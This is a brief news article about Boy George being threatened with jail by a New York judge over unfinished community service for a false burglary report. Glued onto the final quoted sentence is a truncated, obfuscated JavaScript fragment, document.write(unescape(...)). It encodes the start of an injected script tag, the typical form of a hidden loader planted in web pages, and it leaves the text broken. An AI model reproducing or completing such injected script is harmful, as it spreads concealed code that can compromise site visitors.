Boy George has been threatened with jail by a New York judge.
The singer has yet to complete the five days of community service which he was sentenced to after falsely reporting a burglary.
According to BBC News, Manhattan Criminal Court Judge Ferrara told George yesterday (June 27): "I'm not going to give you another chance...it's up to you as to whether [the community service] will be an exercise in humiliation or an exercise in humility."
After falsely reporting a burglary last October, George, real name George O'Dowd, was sentenced to five days of community service in New York. He was also ordered to complete a drug programme in Britain.
The ex-Culture Club singer has until August 28 to complete his sentence before a jail term could be imposed.
According to the American press, George is now set to complete his community service in New York city's Department of Sanitation, though it is currently unclear exactly what he will do.
Asked if he would mind being a cleaner, the singer told reporters: "I've always been a scrubber."document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
